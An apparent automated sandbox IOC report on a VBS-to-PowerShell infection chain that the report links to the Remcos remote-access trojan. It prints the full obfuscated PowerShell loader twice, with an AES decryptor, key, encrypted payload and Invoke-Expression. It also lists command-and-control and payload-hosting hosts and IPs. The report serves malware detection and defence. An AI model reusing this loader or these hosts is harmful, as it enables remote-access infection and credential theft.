Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs"

Details

Is windows:	true
Is dropped:	false
PID:	2076
Target ID:	0
Parent PID:	2580
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	07:29:58
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6e5c30000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution	System Summary
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

Details

Is windows:	true
Is dropped:	false
PID:	6744
Target ID:	1
Parent PID:	2076
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)\|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	07:29:58
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff788560000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
VBScript performs obfuscated calls to suspicious functions	Data Obfuscation	Scripting
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Obfuscated command line found	Data Obfuscation	Command and Scripting Interpreter Deobfuscate/Decode Files or Information
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Details

Is windows:	true
Is dropped:	false
PID:	1344
Target ID:	3
Parent PID:	6744
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	07:30:04
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7f0000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Remcos	Stealing of Sensitive Information
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Maps a DLL or memory area into another process	HIPS / PFW / Operating System Protection Evasion	Process Injection
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Yara detected WebBrowserPassView password recovery tool	Stealing of Sensitive Information
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location	System Summary
Found strings which match to known social media urls	Networking
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml"

Details

Is windows:	true
Is dropped:	false
PID:	7228
Target ID:	4
Parent PID:	1344
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	07:30:07
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x530000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Remcos	Stealing of Sensitive Information
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Maps a DLL or memory area into another process	HIPS / PFW / Operating System Protection Evasion	Process Injection
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Yara detected WebBrowserPassView password recovery tool	Stealing of Sensitive Information
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location	System Summary
Found strings which match to known social media urls	Networking
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn"

Details

Is windows:	true
Is dropped:	false
PID:	7236
Target ID:	5
Parent PID:	1344
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	07:30:07
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0xe10000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Remcos	Stealing of Sensitive Information
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Maps a DLL or memory area into another process	HIPS / PFW / Operating System Protection Evasion	Process Injection
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Yara detected WebBrowserPassView password recovery tool	Stealing of Sensitive Information
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location	System Summary
Found strings which match to known social media urls	Networking
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"

Details

Is windows:	true
Is dropped:	false
PID:	7252
Target ID:	6
Parent PID:	1344
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	07:30:07
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x2f0000
Modulesize:	73728
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Remcos	Stealing of Sensitive Information
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Maps a DLL or memory area into another process	HIPS / PFW / Operating System Protection Evasion	Process Injection
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Yara detected WebBrowserPassView password recovery tool	Stealing of Sensitive Information
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location	System Summary
Found strings which match to known social media urls	Networking
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"

Details

Is windows:	true
Is dropped:	false
PID:	7268
Target ID:	7
Parent PID:	1344
Name:	RegAsm.exe
Class:	system-tools
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
Size:	65440
MD5:	0D5DF43AF2916F47D00C1573797C1A13
Time:	07:30:07
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0xe00000
Modulesize:	73728
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Remcos	Stealing of Sensitive Information
Yara detected Remcos RAT	AV Detection, E-Banking Fraud, Stealing of Sensitive Information, Remote Access Functionality
Yara detected UAC Bypass using CMSTP	Exploits
Injects a PE file into a foreign processes	HIPS / PFW / Operating System Protection Evasion	Process Injection
Installs a global keyboard hook	Key, Mouse, Clipboard, Microphone and Screen Capturing	Input Capture
Maps a DLL or memory area into another process	HIPS / PFW / Operating System Protection Evasion	Process Injection
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Writes to foreign memory regions	HIPS / PFW / Operating System Protection Evasion	Process Injection
Yara detected WebBrowserPassView password recovery tool	Stealing of Sensitive Information
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location	System Summary
Found strings which match to known social media urls	Networking
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	6108
Target ID:	2
Parent PID:	6744
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	07:29:58
Date:	27/07/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

maveing.duckdns.org

http://www.imvu.comr

unknown

https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W

unknown

https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad

unknown

https://aefd.nelreports.net/api/report?cat=bingth

unknown

https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc

unknown

https://contoso.com/License

unknown

http://geoplugin.net/json.gp7

unknown

http://www.nirsoft.net

unknown

https://aefd.nelreports.net/api/report?cat=bingaotak

unknown

https://deff.nelreports.net/api/report?cat=msn

unknown

https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr

unknown

https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742

unknown

https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr

unknown

http://198.46.176.133

unknown

http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com

unknown

https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51

unknown

https://www.google.com

unknown

https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c

unknown

http://198.46.176.133/Upload/vbs.jpeg00Bj

unknown

http://geoplugin.net/json.gp/C

unknown

https://maps.windows.com/windows-app-web-link

unknown

http://198.46.176.133/Upload/vbs.jpeg7

unknown

https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat

unknown

http://geoplugin.net/json.gpP

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8

unknown

https://login.yahoo.com/config/login

unknown

http://www.nirsoft.net/

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d

unknown

https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d

unknown

https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg

unknown

http://geoplugin.net/json.gpd

unknown

https://www.office.com/

unknown

http://nuget.org/NuGet.exe

unknown

https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8

unknown

http://198.46.176.133/Upload/vbs.jpeg

198.46.176.133

https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68

unknown

https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://geoplugin.net/json.gpl

unknown

https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437

unknown

http://www.imvu.com

unknown

https://aefd.nelreports.net/api/report?cat=wsb

unknown

https://contoso.com/Icon

unknown

https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326

unknown

http://192.3.176.154/50/HNBC.txt

192.3.176.154

https://github.com/Pester/Pester

unknown

https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03

unknown

http://geoplugin.net/json.gp

178.237.33.50

https://aefd.nelreports.net/api/report?cat=bingaot

unknown

https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae

unknown

https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7

unknown

https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD

unknown

https://aefd.nelreports.net/api/report?cat=bingrms

unknown

https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993

unknown

https://www.google.com/accounts/servicelogin

unknown

https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5

unknown

http://geoplugin.net/json.gpR9

unknown

https://aka.ms/pscore68

unknown

https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3

unknown

https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135

unknown

http://192.3.176.154

unknown

https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59

unknown

http://www.ebuddy.com

unknown

There are 59 hidden URLs, click here to show them.

Domains

Name

Malicious

maveing.duckdns.org

192.3.101.142

Details

Name:	maveing.duckdns.org
IP:	192.3.101.142
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Uses dynamic DNS services	Networking	Application Layer Protocol
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

geoplugin.net

178.237.33.50

Details

Name:	geoplugin.net
IP:	178.237.33.50
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

192.3.101.142

maveing.duckdns.org

United States

192.3.176.154

unknown

United States

Details

IP:	192.3.176.154
TargetID:	1
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	36352
ASN name:	AS-COLOCROSSINGUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

198.46.176.133

unknown

United States

Details

IP:	198.46.176.133
TargetID:	1
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	36352
ASN name:	AS-COLOCROSSINGUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

178.237.33.50

geoplugin.net

Netherlands

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Rmc-F4JFYD

exepath

